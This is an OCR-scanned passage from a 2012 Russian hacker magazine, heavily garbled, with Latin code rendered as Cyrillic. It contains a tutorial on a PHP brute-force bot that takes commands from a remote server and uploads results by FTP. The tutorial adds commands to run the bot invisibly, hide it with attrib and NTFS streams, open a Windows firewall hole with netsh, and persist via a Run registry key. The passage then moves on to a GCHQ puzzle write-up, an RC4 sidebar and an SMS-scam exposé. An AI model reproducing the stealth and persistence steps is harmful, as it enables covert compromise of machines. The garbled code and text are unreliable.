также может содержать расшифровку. При этом нужно сделать так, 
чтобы боты использовали разные словари для брутфорса, так как 
брутить один и тотже словарь много раз просто не имеет смысла. 

Также следует учесть, что хешей может быть много, поэтому мы 
не станем гонять весь словарь через брутфорс для каждого из них. 
В процессе брута мы будем сразу же сверять результаты со все- 
ми хешами, которые нужно расшифровать. Вообще, скрипт будет 
иметь всего несколько функций и выступит, так сказать, в качестве 
обертки (шедулера), «дергающей» уже сам брутфорсер. Именно 
поэтому нам нужно выбрать такой брутфорсер, который работает 
через консоль, так как далее мы переведем скрипт в ехе, который 
тоже работает в консольной среде. Я использовал наработку моего 
знакомого — она имеет такой синтаксис: 

шсІБ.ехе {файл хешей} {файл словаря} {где сохранять} 

Здесь первый параметр — это название файла с хешами для 
брутфорса (один хеш = одна строка), второй параметр — название 
файла со словарем, а последний параметр — название файла, 
в который брутер будет записывать результаты. Задачи серве- 
ра — правильно установить бота, периодически чистить рабочую 
папку, а также подавать сигналы о том, что пора бы уже начать 
брут по таким-то хешам. Для начала напишем функцию обращения 
к серверу для получения текущего задания: 



ту5е1;1;іп§5( ) 

{ 

$5е1;1:іп§5 = б1е_§е1;_соп1;еп1;5( 

'Іі1;1;р://асІге5.сот/?сІо=ту5е1;1;іп§5 ' ) ; 

($5е1;1:іп§5 != '') 

{ 

1І5І:($5І;а1;и5^ $5І:а1:и5СІа1:а) = 
ехр1осІе( ' I ' ^ $5е1:1:іп§5^ 2 ); 

$сопб§ = ( ' 5І:а1;и5 ' => $5І;а1;и5^ 

'сіа1;а' => $5І:а1:и5СІа1;а); 

$сопб§; 

} 

■Раізе; 

} 

Эта функция обращается к нашему гейту, ловит ответ, и, если 
он не пустой, делит его на две части там, где есть символ |. Первая 
часть представляет собой команду для бота, а вторая — допол- 
нительные данные для этой команды. Теперь напишем функцию 
брутфорса на основе заданных в виде аргумента хешей (массив): 

Ьги1:еНа5Ііе5($Ііа5Ііе5) 

{ 

// Сохраняем хеши для брутера 

б1е_ри1;_соп1;еп1;5( ' ./Ьги1:е.1:х1: ' ^ ітр1осІе("\г\п"^ $Ііа5Ііе5)); 

// Говорим серверу^ что мы уже работаем 
б1е_§е1;_соп1:еп1:5 ( 

' 1т1;1;р : //асігез . та5І;ег . зегѵега . сот/ ?сІо=іатыогкіп§ ' ) ; 

// Брутим 

ра55І;Ііги( 'тсІБ.ехе Ьги1:е.1;х1: ѵосаЬиІагу .1;х1: гезиІІіБ .1;х1: ' ) ; 

// Сохраняем результат на сервере по ФТП 

$ир1оасІег = -Рі:р_соппес1;( '-Рі;р://асІге5.та5І;ег.5егѵега.сот' ); 

■Рі;р_1о§іп($ир1оасІег^ '1о§іп'^ ' разБыогсІ ' ) ; 
■Рі;р_ри1;($ир1оасІег^ ' ./гезиІІіБ/' .1;іте() . ' .1;х1:' ^ 
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' ./ге5и11;5.1;х1;', РТР_А5СІІ); 

■Рі;р_с105е($ир1оасІег) ; 

// Говорим серверу^ что мы закончили 
1і1е_§е1;_соп1;еп1;5 ( 

' Іі1;1;р: //асігез .шаБІіег. Бѳгѵега . сот/?сІо=іат1іпІБІіесІ ' ) ; 

} 

Итак, функция берет в качестве аргумента массив с хешами 
и сохраняет его в удобоваримом для брутера формате, то есть 
в виде текстового файла, в каждой строке которого находится 
один хеш. Затем бот стучит на сервер с сигналом о том, что начал 
работать. Это нужно для того, чтобы сервер не записывал бота 
в «мертвые» машины, если он не будет отстукивать каждые пять 
минут (тайм-аут по умолчанию), и помнил, что бот функционирует. 
Далее заводим самого бота, указав ему созданный файл хешей, 
установленный словарь и файл для сохранения результатов. Соз- 
даем также функцию «установки» бота. Установка представляет 
собой скачивание и последующее сохранение словаря, по которо- 
му нужно брутить: 

.'цпс іпБІ;а11ѴосаЬ() 

{ 

$ѵосаЬи1агу = 1і1е_§е1;_соп1;еп1;Б( 

'Іі1;1;р://асІгеБ.сот/ипіяие_ѵосаЬи1агу.рІір' ) ; 
б1е_ри1:_соп1;еп1:Б( ' ./ѵосаЬи1агу.1;х1; ' ^ $ѵосаЬи1агу) ; 

} 

Серверный скрипт, к которому обращается бот, должен воз- 
вращать исключительно уникальные словари, чтобы у каждой 
машины был свой «словарный запас». Также стоит оставить 
возможность менять словарь с помощью команды, отправляемой 
через мастер-сервер. Теперь же нам необходимо накодить самую 
главную функцию — функцию шедулера, выполняющую также 
команды мастер-сервера. Объем статьи не позволяет привести 
здесь код этой функции полностью, поэтому укажу лишь ее кейсы 
(полный код ищи на нашем диске): 

• Ьгиіе — брут; 

• сіеап — очистка данных, полученных в результате предыдущих 
брутфорсов; 

• іпБІаІІ — установка; 

• ехіі — выход. 

По дефолту шедулер находится в режиме ожидания команд. 

В качестве тайм-аута мы указали 300 секунд. Это временной 
интервал обращения ботов к нашему серверу. Далее идет запуск 
команд с учетом данных, переданных сервером боту, причем по- 
сле выполнения команды мы делаем паузу (в некоторых случаях) 




Компилим батник для скрытного запуска брутера 

и снова запускаем шедулер. Нужно учесть, что файл словаря не- 
обходим уже при первом обращении к серверу, поэтому сделаем 
предохранитель, который подготавливает словарь и запускает 
шедулер: 

" - ( Иі1е_ехІБІ;Б( ' ./ѵосаЬи1агу.1;х1; ' )) 

{ 

іпБІ;а11ѴосаЬ(); 

} 

БІ:аг1:5сІіесІи1ег() ; 

КОМПИЛИМ 

Теперь, когда мы объединили всё это в один файл, перед нами 
встает задача создать из него полноценный ехе. В этом нам по- 
может небольшая тулза с длинным названием ВатЬаІат РНР ЕХЕ 
СотріІег/ЕтЬесІсІег. 

Она представляет собой билдер, который создает ехе из РНР- 
файла. Билдер за всё время его использования ни разу не подво- 
дил, работал отлично, без всяких багов (респект авторам!). Этот 
билдер позволяет компилить экзешники как для РНР 4.0, так и для 
более новых версий интерпретатора. В простейшем случае компи- 
ляция в ВатЬаІат выглядит воттак: 

Ьатсотрііе [-орІііопБ] іпбІе.рЬр [ои1;1і1е.ехе] 



ОБЗОР КОМПИЛЯТОРОВ ИНТЕПРЕТИРУЕМЫХ языков ПРОГРАММИРОВАНИЯ 



1 


РНР ОеѵеІБіисЛо 


2 


РИр2ехе 

ь:[ Іѵ/ѵІѴ4ѵ^ 


3 


ВатЬаІат ЕтЬесІсІег 

Ьі[ Іѵ/ѵѵсЭт;Г. 


4 


ру2ехе 

Іѵ/^Кк,Кѵѵ 


сл 



Однозначный лидер 
по конвертированию РНР- 
скриптов в полноценные 
программы. Тут 
и визуальная среда 
программирования, 
и отладка кода, 
и подключение различных 
модулей и многое другое. 



Преобразует исходный 
код на РНР в исполняемый 
файл. Чтобы созданное 
приложение могло 
запуститься, в той же 
директории должна 
иметься библиотека 
рЬр5(Б.с111. 



Более мощный инструмент, 
не имеющий ЗІЛ- 
интерфейса и позволяющий 
паковать прямо в консоли. 
Также компилирует целые 
проекты с использованием 
различных библиотек, 
например сІІРІ. 



Позволяет компилировать 
скрипты, написанные 
на Питоне, в экзешники. 
Помимо исполняемого 
файла, создает несколько 
библиотек, помогающих 
готовой программе 
запуститься. 



Рег12Ехе 



Отличный инструмент для 
перевода перловки в ехе. 
Создает независимый 
исполняемый файл, 
который работает в любых 
системах и натребует 
интерпретатора. 



064 



ХАКЕР 03/158/2012 









РНР-бот для ѴѴіпсІоѵѵз 
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Сервис на базе распределенных вычислений для расшифровки М05-хешей 



Итак, бот готов. Теперь займемся сервером. Во-первых, нужно 
зафиксировать в базе те боты, которые успешно отстучали нам 
хотя бы один раз, то есть, так сказать, установленные боты. Для 
этого выполняется проверка ІР-адресов в базе (можно присвоить 
специальный идентификатор каждой машине, который она будет 
передавать каждый раз, чтобы различить между собой хосты, 
находящиеся за МАТ), после чего в базу добавляются те адреса, 
которые не были в ней найдены. Их можно выводить в панели 
управления ботами. Но на тот случай, если бот уже брутит и не мо- 
жет отстучать, что он живой, можно также сделать в таблице 
столбец ІазІсаІІЬаск. Там отображается число, которое указывает, 
когда бот отстучал в последний раз. Таким образом, при каждом 
обращении к серверу это значение обновляется. 

Если оно больше 300 (дефолтный пятиминутный интервал 
отстукивания бота), то это значит, что бот работает или находится 
в офлайне. Затем нужно создать генератор конфигов. Конфиг, как 
ты, возможно, заметил по вышеприведенным кускам кода, состо- 
ит из двух частей, объединенных знаком |. 

Первая часть отвечает за команду, которую получает бота, 
а вторая — за дополнительные данные, нужные для исполнения 
этой команды. Чтобы дать команду на установку, мы должны 
отправить что-то вроде іп5ІаІІ|ѵосаЬ_123123123.1хІ, где іпзіаіі — 
это команда установки бота, а ѵосаЬ_123123123.1хІ — это файл 
словаря, который надо установить. Мы также можем очистить все 
рабочие файлы, просто удалив их, — для этого достаточно по- 
слать команду сіеап. Ну и самая главная команда — это Ьгиіе. 

Второй параметр этой команды объединяет хеши для брута 
с помощью двоеточия: 

Ьги1;е | с4са4238а0Ь923820с1сс509аб-Р75849Ь : 
С81е728с19с14с2-Рб36-Р067-Р89сс14862с : ессЬс87е4Ь5се2-Ре28308-р 
с19-Р2а7Ьа-РЗ 

Все результаты заливаются на РТР-сервер, который находится 
там же, где и центр управления. Попадает всё это дело в папку 
гезикз. 

Для того чтобы добавить в базу готовые результаты, бот «дер- 
гает» скрипт с передачей параметра іатЛпізЬесІ. Скрипт сервера 
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Рабочий бот 



проходит по всем файлам в папке гезиііз, поочередно открывает 
их и добавляет в базу. 

ХАКЕРСКИЕ ФИЧИ 

Теперь перейдем к оптимизации нашего самопального комплекса. 
Во-первых, брутер, бот и библиотеку можно запаковать в один 
экзешник, причем так, что процесс функционирования бота станет 
невидимым, то есть консоли не будет видно. 

Для этого можно прибегнуть к подручным средствам, а именно 
составить батник следующего содержания: %СО%\ЬоЕехе. Далее 
нужно скачать софтинку ВАТ То ЕХЕ Сопѵегіег 1.5 и скомпилировать 
в ней этот батник, предварительно указав в настройках іпѵізіЫе 
арріісаііоп и выбрав на вкладке іпсіисіе три файла: ЬоЕехе, библио- 
теку (рЬрбІз.сІІІ) и сам консольный брутер (ппсіб.ехе). 

Программка создаст один файл, работающий в фоновом режи- 
ме. Затем можно сделать так, чтобы скрывались и сами файлы. Для 
этого есть несколько способов. Один из них — это, например, про- 
стое использование штатной виндовой софтины аигіЬ с флагами 
’+Ь' и ’+з'. Пример: 

а1;1:гіЬ "%СО%\Ьо1;.ехе" +6 +з 

Такая команда скроет и сделает системным наш файл бота. 
Спрятать файл в потоках МТР5 немного сложнее: 

ссі "%зу5І:етгоо1:%\5у5І:ет32 

1;уре раскес1_Ьо1; . ехе>са1с . ехе : Ь01; . ехе 

Запуск при этом осуществляется тоже с помощью батника: 

ССІ "%5уз1;етгоо1:%\5у5І:ет32 
5І:аг1: .\са1с.ехе:Ь01:.ехе 

Наш файл в том числе загружает результаты на РТР. Файервол 
ѴѴіпсІоѵѵз может на это ругаться, поэтому попробуем его обойти: 

раз5І:Ііги( ' пеіізіі бгеыаіі асіеі а11оыесІрго§гат %1лІІМОІК%\ 
зу5І:ет32\-Рі;р.ехе ТСРІп-Ргаз1;гис1;иге>пи1 2>&1 '); 

Авторан для нашего ехе (если он лежит, например, 
в %зуз1етгоо1%): 

раз5І;Ііги( ' ге§ асІеІ НКич\зо-Рі;ыаге\тісго50-Рі;\ыіпсІоы5\ 
сиггеп1;ѵег5Іоп\гип /ѵ ІлІіпІІрсІаІіе /1: КЕС_52 /сі 
%1лІІМОІК%\раскесІ_Ьо1:.ехе /-Р>пи1 2>&1'); 

ЗАКЛЮЧЕНИТ 

В РНР предостаточно функций, предназначенных для создания нехи- 
лого файлового менеджера или же простого системного помощника. 

Я надеюсь, что благодаря моей статье ты убедился не только 
в этом, но также и в том, что для автоматизации процесса суще- 
ствует множество различных средств, которые при совместном 
использовании могут сильно тебе помочь. □С 
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РЕШЕНИЕ ЗАДАНИЙ 
ДЛЯ ХАК-КОНКУРСА, 
УЧРЕЖДЕННОГО 
УПРАВЛЕНИЕМ 
ПРАВИТЕЛЬСТВЕННОЙ СВЯЗИ 
ВЕЛИКОБРИТАНИИ 



Недавно Управление правительственной связи ЕШ 
Великобритании объявило небольшой 
][-конкурс, чтобы привлечь к себе внимание 
как к работодателю. Не уверен, что к ним кто- 
то устроился на работу, но пройти задания из 
спортивного интереса наверняка захотели 
многие. 



На нашем диске 
ты сможешь найти 
видео с полным 
прохождением 
конкурса «Сап Ѵои 
Сгаск \ХЬ>. 
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Задание первого этапа 
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Комментарий к файлу с заданием 
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I сап сгаск іі! 



Итак, некоторое время назад Управление 
правительственной связи Великобритании 
объявило конкурс, успешное прохождение 
которого позволяло отправить в Управление 
свое резюме, а затем и устроиться на работу 
в британскую киберразведку. Предложенные 
задания не так уж сложны, да и саму стра- 
ницу отдела кадров Управления правитель- 
ственной связи (6СН0) можно практически 
сразу обнаружить при помощи поисковика 
боодіе, однако этот конкурс всё же интере- 
сен, так как он позволяет оценить уровень 
подготовки сотрудников, которые составля- 
ли задания. 

І^ІРБТ 5ТЕР 

На странице конкурса, находящейся по 
адресу сапѵоисгаскіі.со.ик, мы видим картинку 
с набором НЕХ-значений (смотри соответ- 
ствующий рисунок) и надпись-дразнилку «Сап 
Уои Сгаск \\1». Увидев эти НЕХ-значения, я 
поначалу подумал, что это зашифрованное по- 
слание, начал было считать частоту встречае- 
мости каждого значения и попытался затем 
перевести их в символы А5СІІ, однако у меня 
ничего не вышло. В итоге я решил засунуть все 
НЕХ-значения с рисунка в двоичный файл и 
открыть полученное непотребство в ЮА Рго. В 
итоге мне удалось получить кое-какие резуль- 
таты. ЮАлегко распознал осмысленные куски 
кода для архитектуры х86. Я понял, что выбрал 
правильный путь. 

Недолго думая, я преобразовал получен- 
ный кусок кода в функцию и запустил деком- 
пилятор. Сначала в стеке выделяется место 
под массив в 256 байт, который заполняется 
значениями от О до 255, а далее выполняется 
процедура преобразования массива, которая 
на самом деле представляет собой алгоритм 
инициализации шифра РС4 с размером блока 
8 бит и ключом ОхОЕАОВЕЕР (смотри рисунок). 
После всего этого вызывается еще одна функ- 
ция, стек которой испорчен, и поэтому она не 
по зубам декомпилятору. 

Как оказалось, в начале второй функ- 
ции значение регистра евр, содержащего 
указатель на вершину стека, меняется на 



адрес конца нашего кода, указывающий, где 
содержится значение ОхАААААААА. Далее 
из стека извлекается ОѴѴОРО, который срав- 
нивается с ОхАААААААА. Затем извлекается 
еще одно значение, которое сравнивается 
с ОхВВВВВВВВ. Однако этого куска данных 
(второй половины стека функции) у нас нет. 

Чтобы найти вторую половину стека нашей 
функции, необходимо сохранить картинку с за- 
данием с сайта и посмотреть, как эта функция 
устроена. Недостающие данные содержатся в 
дополнительной секции ІТХІ РМО-файла с за- 
данием (кодировка ІЯР-8). Бинарные данные 
закодированы с помощью алгоритма Вазе64 и 
следуют за словом Соттепі (смотри рисунок). 
Раскодировав и склеив два бинарника, я за- 
пустил код на выполнение (под отладчиком) и 
просмотрел результат процедуры дешифрова- 
ния, который представляет собой следующую 
строку: 

СЕТ /15Ь436сІе1-Р9107-Р3778аасІ525е5сІ0Ь20о'5 
НТТР/1.1 

После отправки соответствующего 6ЕТ- 
запроса на сервер получаем второе задание. 

Кстати, код можно запустить нескольки- 
ми способами. Я создал простой ехе-файл, 
в котором сначала считывается кусок кода с 
заданием, а потом всё это дело запускается на 
выполнение (под контролем ЮА) при помощи 
простой ассемблерной вставки: 

авш 

і 

ІПІ; 3; програм мная точка останова 
тоѵ еах, аггау: аггаѵ - массив с кодом 
саіі еах; зап уск кода на выполнение 
} 

Хочу отметить, что в начале кода происхо- 
дит )тр через четыре (вроде бы) неиспользуе- 
мых байта. Эти четыре байта пригодятся нам в 
дальнейшем. Как видишь, первое задание до- 
вольно простое. Затруднения возникли лишь 
при обнаружении второй части стека функции 
в дополнительной секции РМС-файла с зада- 



і 

№ ыі; // Рс^і 
ІПІ // г^^іЯЗ 

Іііі // еИл03 
€Іілг // [тЦіИ 

и0> - 1^ 

ЮВѴТЕ(у«> - м4 * 1; 

( { 0ѴТЕ)ѵіі >; 
іЛ - в; ” 

іГо 

( 

ѵ2 - ІЭ! 

ѵэ - 

иІі^ѵО] - иЗ;; 

- ѵй * 1; 

■ПІІР ^ >; 

) Г 



Результат декомпиляции 



нием. Для этого не нужно знать формат РМС, 
а достаточно просто быть внимательным (не- 
обходимая информация содержится в самом 
начале файла). 

5ЕС0МР5ТЕР 

Во втором задании авторы предлагают нам 
попробовать написать эмулятор микро- 
процессора. Дан кусок памяти с кодом и 
данными, а также описана архитектура 
микропроцессора, для которого всё это 
предназначено. Процессор состоит из 
восьми регистров, четыре из которых (гО... 
гЗ) представляют собой регистры общего на- 
значения, два предназначены для хранения 
адреса сегмента кода и адреса сегмента 
данных (с5 и СІ5 соответственно), один ре- 



иміх срѵрто 
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Функция сгурі в операционных системах *піх 
служит для хеширования различных данных, 
в том числе паролей пользователей системы. 
Традиционная реализация этой функции 
использует американский алгоритм 0Е5 (Оаіа 
Епсгурііоп ЗіапсІагсІ). Пароль пользователя 
сокращается до восьми символов, от каждого 
из которых, в свою очередь, берется 7 бит. 
Восемь наборов по 7 бит формируют 56-битный 
ключ алгоритма 0Е5, при помощи которого 
шифруется блок из восьми нулевых байт. Затем 



полученный блок шифрованного текста вновь 
шифруется с помощью алгоритма 0Е5 и т. д. 
Таким образом, блок из восьми нулевых байт 
шифруется в процессе работы 25 раз. Стоит 
отметить, что сгурі не использует стандартную, 
эталонную реализацию алгоритма 0Е5. 
Алгоритм каждый раз слегка меняется. Его 
конкретная реализация зависит от соли длиной 
12 бит. Соль и шифрованный текст в итоге 
преобразуются в строку при помощи алгоритма 
Вазе64. 



Основной функционал программы кеудеп 
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5оуои сіісі ІЕ — поздравление суспешным выполнением заданий 



Неиспользованные значения из первого и второго заданий 

гистр служит для хранения флага операции 
(Лд), и один — для хранения адреса текущей 
инструкции (ір). 

Микропроцессор обладает набором из 
восьми инструкций, каждая из которых (за 
исключением инструкции Ыі, прекращаю- 
щей выполнение программы) имеет два 
режима работы: тоб О и тоб 1. В принципе, 
для успешного выполнения задания до- 
статочно обладать небольшими навыками 
программирования, а также представлять, 
как работают микропроцессоры. Однако в 
процессе программирования я наткнулся 
на несколько подводных камней. Сперва я 
объединил в один массив регистры общего 
назначения, а для сз и бз выделил отдель- 
ные переменные. Как оказалось, это оши- 
бочный подход, так как в коде встречаются 
инструкции типа «абб г[5], 12», которые, по 
замыслу разработчиков задания, изменяют 
значения сегментных регистров напрямую (в 



описании задания упоминается регистр сз, 
так же как и г5). Второй подводный камень 
— реализация ^аг )иппр'ов и изменения ір. 
Здесь просто надо знать, что значения ре- 
гистров, отвечающих за номера сегментов, 
изменяются только при дальних переходах и 
не изменяются, если ір начинает указывать 
на новый сегмент кода. В остальном же всё 
просто и прозрачно. Разработчики заданий 
предлагают нам реализовать эмулятор на 
языке баѵаЗсгірІ, однако на то, будет ли 
учтено выполненное задание, выбор языка 
программирования не влияет. Я реализо- 
вал эмулятор процессора на С. Программа 
выполняется довольно быстро, хотя у меня 
были подозрения, что разработчики напи- 
шут код, который будет работать полчаса :-). 
После остановки процессора (выполнения 
инструкции ЬК) в памяти появится ключ к 
третьему этапу конкурса — очередной 6ЕТ- 
запрос: 



6ЕТ /ба75370-Ре15с4148Ьб4сеес861-РЬбаа5 . ехе 
НТТР/1.0 

ТНІРР5ТЕР 

Отсылая очередной ОЕТ-запрос к сайту, полу- 
чаем третье задание — исполняемый файл. При 
просмотре зависимостей этого файла видно, 
что для его работы необходим Судѵѵіп. Вообще, 
в свойствах полученной программы указано, 
что настоящее имя экзешника кеудеп.ехе, так 
что смело переименовываем его. 

В этот раз опять никаких проблем с ревер- 
сом — код никак не обфусцирован. При запу- 
ске кеудеп требует передать ему ІІРЕ сайта для 
соединения в качестве первого параметра. Ал- 
горитм работы программы достаточно прост: в 
текущей директории выполняется поиск файла 
Іісепсе.іхі, из которого считывается строка, а 
также три числа. Судя по строкам в сегменте 
данных, требуемые числа представляют собой 
Зіаде опе Іісепсе кеу и Зіаде Іѵѵо Іісепсе кеу. 



ВОССТАНОВЛЕНИЕ КРИПТОГРАФИЧЕСКИХ АЛГОРИТМОВ 



В настоящее время сложно найти 
коммуникационную систему, которая не 
использовала бы криптографию. Часто в 
процессе реверс-инжиниринга различных 
модулей необходимо распознавать 
и восстанавливать используемые 
криптографические алгоритмы, режимы их 
работы, порядок выработки и использования 
ключей шифрования и т. д. Разбор конкретной 
реализации алгоритма также нередко 
позволяет не только выявить ее ошибки, но 
и определить, что алгоритм используется 
неправильно, в результате чего могут 
возникать уязвимости, позволяющие в 
конечном итоге провести успешную атаку на 
систему в целом. 

Вообще, универсального рецепта по 
распознаванию криптографических 
алгоритмов не существует, можно лишь 
выделить некоторые подходы и описать 
некоторые признаки, которые позволяют 



«заподозрить» тот или иной участок кода в 
принадлежности к какому-либо алгоритму. 
Так, например, современные симметричные 
блочные алгоритмы шифрования обычно 
построены по итерационной схеме, в которой, 
как правило, производится замена значений в 
соответствии с некоторой таблицей в памяти, 
наложение ключа шифрования и линейное 
преобразование. При этом в пределах одной 
функции в ассемблерном листинге может 
встретиться цикл, большое количество 
инструкций типа тоѵ, тоѵ 2 х, асісі, хог, зЫ, зИг 
и т. д., а также частые обращения к памяти (в 
качестве примера смотри рисунок). 

Кроме того, для каждого криптографического 
алгоритма можно выделить некоторые 
«отличительные черты», которые позволяют 
автоматизировать поиск необходимых 
участков кода. Чаще всего такими признаками 
служат константы, характерные для того 
или иного алгоритма. Для симметричных 



алгоритмов это могут быть блоки подстановок 
(ЗВох'ы), некоторые специфические константы, 
а также такие параметры алгоритма, как длина 
ключей (в том числе длина массива раундовых 
ключей), длина блока, количество итераций 
(раундов) и т. д. Подобными признаками 
также обладают и хеш-функции. Алгоритмы 
хеширования обычно используют большие 
наборы констант, что облегчает распознавание 
типа алгоритма и его восстановление. 

Стоит отметить, что в подавляющем 
большинстве программных реализаций 
симметричных алгоритмов шифрования 
функция выработки массива раундовых ключей 
(кеу зсИесІиІе) и функция дешифрования/ 
шифрования открытого текста находятся в 
разных участках кода программы. Это помогает 
ускорить процесс обработки информации (и 
не тратить каждый раз время и ресурсы на 
получение кеу зИесІиІе из основного ключа 
алгоритма). 
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I сап сгаск іі! 



то есть это некоторые данные, для получения 
которых необходимо решить задачи, предла- 
гаемые на первом и втором этапах конкурса. 
Прочитанная из файла строка преобразуется 
при помощи функции сгурі (из Судѵѵіп) и срав- 
нивается с эталонным значением из сегмента 
данных программы. Дойдя до этого этапа, я 
уж было принялся ломать хеш из сегмента 
данных, однако это был тупиковый путь, и всё 
оказалось гораздо проще. Необходимый ІР- 
адрес получается с использованием первого 
параметра программы (ІІРІ сервера) и 0М5. 

Как несложно догадаться, ІІРІ должен пред- 
ставлять собой адрес страницы с заданиями: 
сапуоисгаскте.со.ик . Далее кеудеп.ехе форми- 
рует к удаленному серверу СЕТ-запрос вида: 

6ЕТ /%5/%08Х/%08Х/%08Х/кеѵ.1:х1: НТТР/1.Ѳ 

Как я упоминал ранее, на месте строки в за- 
просе стоит хеш-значение из сегмента данных. 
Остается лишь найти значения «лицензионных 
ключей» первого и второго этапов заданий, 
для чего я начал собирать данные, которые 
на этих этапах не использовались. На первом 
этапе это четыре байта в начале кода, через 
которые шел первоначальный )иппр. Для 
второго этапа это нигде не пригодившееся два 
ОѴѴОРО-значения Ягтѵѵаге (смотри рисунок). 
Вообще, во втором задании не использовался 
весь третий банк памяти, который начинается 
с сигнатуры 1г, однако не является одноимен- 
ным архивом. Этотучасток, не потребовавший- 
ся для выполнения задания, видимо, нужен 
просто для того, чтобы запутать конкурсантов. 



Итоговый 6ЕТ-запрос к серверу имеет 
следующий вид: 

СЕТ /ІідОТК7Ь8К2гѵы/АЗВРС2АР/О2АВ1Р05/ 
РА13Р11Ѳ/кеѵ.1:х1: НТТР/1.Ѳ 

Этот запрос позволяет просмотреть файл 
кеу.іхі, в котором указан ключ от страницы 
с поздравлением «5о уои сіісі ІЬ> и ссылкой 
на описание вакансии, в котором говорится, 
что конкурсанту, успешно выполнившему все 
задания, отнюдь не предлагают работу прямо 
сейчас, но согласны рассмотреть его канди- 
датуру позже, когда в Управлении появятся 
свободные вакансии. 



5ЦММАРУ 

Задания от Управления правительствен- 
ной связи Великобритании не представля- 
ют никакой сложности и в первую очередь 
ориентированы на проверку смекалки, а уже 
потом — навыков реверс-инжиниринга и про- 
граммирования и знаний о принципах работы 
микропроцессоров. Выполнить эти задания под 
силу любому человеку, у которого достаточно 
терпения и энтузиазма. Это косвенно свиде- 
тельствует о том, что в ВСЕЮ работают обычные 
люди, еѵегубау Ьегоез, а не те супермены, 
которые в зрелищных голливудских фильмах 
взламывают пароли за пару минут и с легкостью 
проникают в защищенные сети правительств 
разных стран. Напоследок хочется поблаго- 
дарить британцев за еще одну возможность 
«размяться» и проверить свои знания. Задания 
наших спецслужб были бы куда хардкорнее. ^ 
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Кусок ассемблерного листинга алгоритма АЕ5 



АЛГОРИТМ РС4 



Алгоритм РС4 (также известен как АРС4) на 
сегодняшний день является одним из самых 
известных и широко используемых поточных 
шифров. Алгоритм был разработан Роном 
Ривестом, одним из основателей компании 
Р5А Бесигііу, в далеком 1987 году. РС4 об- 
ладает рядом достоинств, к которым в первую 
очередь относятся высокая скорость работы 
и переменная длина ключа. На каждом такте 
работы алгоритм генерирует 8 бит псевдослу- 
чайной последовательности и изменяет свое 
внутреннее состояние, которое определяется 
перестановкой значений от О до 255 (5) и 
двумя однобайтными индексами: і и ). Алго- 
ритм РС4 состоит из двух частей: процедуры 
инициализации (К5А) и алгоритма выработки 
псевдослучайной последовательности. Про- 
цедура инициализации служит для выработ- 
ки перестановки 5 при помощи ключа длиной 
от 40 до 256 бит. К5А описывается следующим 
псевдокодом: 

■Рог і -Ргош 0 1;о 255 

5[і] := і 

епсІ-Рог 

] := 8 

іог і -Ргош 0 ІІО 255 

д := (д + 5[і] + кеу[і тосі кеу1еп§1;Іі] ) 
тосі 256 

5ыар ѵаіиез о-Р 5[і] апсі 5[д] 
епсІ-Рог 

Алгоритм выработки псевдослучайной 
последовательности также достаточно прост. 
Он описывается следующим псевдокодом: 

і := 0 

Р := Ѳ 

ыбііе (зепега1:іп^Ои1:ри1:: 

і := (і + тосі 256 

д := (д + 5[і]) тосі 256 
5ыар ѵаіиез о-Р 5[і] апсІ 5[д] 

К := 5[(5[і] + 5[д]) тосі 256] 

ои1:ри1: К 

епсіыбііе 



Алгоритм РС4 применяется для шифрования 
данных в протоколе 551, защиты трафика 
в ѴѴЕР, защиты документов АсІоЬе РОЕ и 
МІСГ050Й ОНісе. Широко известны случаи, 
когда неправильное использование данного 
алгоритма позволяло восстановить конфи- 
денциальную информацию. Так, некоторое 
время назад для защиты содержимого 
РОР-документов применялся РС4 с длиной 
ключа 40 бит, в результате чего злоумыш- 
ленник мог получить доступ к содержимому 
файла простым перебором ключа. В одной 
из версий М5 ОНісе из-за неправильного 
использования РС4для защиты файлов для 
восстановления их содержимого хватало 
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Александр «Іі^е4и» Фаронов 
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ІМРО 

Существуют 
партнерские 
программы, 
обманывающие 
самих нечестных 
веб-мастеров. 
Впрочем, долго 
такие партнерки 
не живут. 



ПОХУДЕЙ ЗА 30 ДНЕЙ! 
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Видел ли ты когда-нибудь сетевые ресурсы с заголовками 
вроде «Отличная диета Ксении Бородийой»? Или всевозможные 
тестирования, где после полсотни вопросов предлагается отправить 
5М5, чтобы получить результат? Как устроены эти разводки и почему 
они работают? * ‘ 



ВСЯ 

ПОДНОГОТНАЯ 

ИЗВЕСТНОГО 

ЛОХОТРОНА 






Фальшивые 5М5: похудей за 30 дней! 




Качественно проверить зрение без врача? Ну-ну 



Парсинг ключевых слов через «Магадан» 



НЕМНОГО ПРО СМС 



Еще с десяток лет назад ты и представить 
себе не мог, что покупки в интернете и раз- 
личные услуги можно будет оплачивать с по- 
мощью обычных эсэмэсок. Потенциальный 
покупатель заходит на определенный сайт 
и, заинтересовавшись каким-либо товаром, 
расплачивается за него посредством обычной 
эсэмэски с определенным текстом, отправляя 
ее на указанный короткий номер (например, 
1234). После того как покупатель отправил 
5М5, с его счета снимается определенная сум- 



ма, установленная владельцем сайта. В итоге 
все довольны и прыгают от счастья, ведь юзер 
быстро и удобно оплатил товар, а продавец 
так же быстро получил свои деньги. Эта со- 
временная система приема 5М5-платежей 
называется 5М5-биллингом. 

Хотя оплата услуг и покупок в интернете 
с помощью кредитных карт практикуется всё 
чаще, этот способ пока не слишком популя- 
рен среди большей части населения и даже 
вызывает подозрения. Преимущества 5М5- 
биллинга перед «стандартными» способами 



оплаты через электронные платежные систе- 
мы (такие как ѴѴеЬМопеу или Яндекс. Деньги) 
очевидны: покупателю не надо заморачивать- 
ся с предоставлением своих персональных 
данных (паспорт, почта и ответы на всякие 
каверзные вопросы) третьей стороне, а также 
возиться со всевозможными программами 
оплаты или их онлайн-аналогами. Опла- 
та посредством 5М5 в этом плане сильно 
выигрывает. Но, конечно же, здесь присут- 
ствуют и свои недостатки, а именно бешеная 
комиссия, которую забирает компания, предо- 



ПОЧЕМУ ОБМАНЩИКОВ ТРУДНО ПРИВЛЕЧЬ К ОТВЕТСТВЕННОСТИ? 



I 



Как ни странно, но тех, кто занимается 
разводом по СМС, оченьтрудно привлечь 
к ответственности. Почему, спросишь 
ты? Всё дело в тех самых примечаниях, 
которые маленькими буковками написаны 
на мошеннических сайтах. Ведь если эти 
примечания внимательно прочесть, можно 
увидеть, что в них черным по белому написано, 
сколько стоит СМС (на большинстве сайтов 
об этом пишут, да-да!) и как отказаться 
от надоедливой подписки, а также приведена 
полная информация о порядке предоставления 
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услуг конечному пользователю. А раз 
информация приведена, значит, организаторы 
развода не виноваты. Ты же не подаешь 
в суд на изготовителей пищевых продуктов? 

А ведь на упаковках многих из них такими 
же маленькими буковками столько всего 
написано, что, если всё это прочитать, 
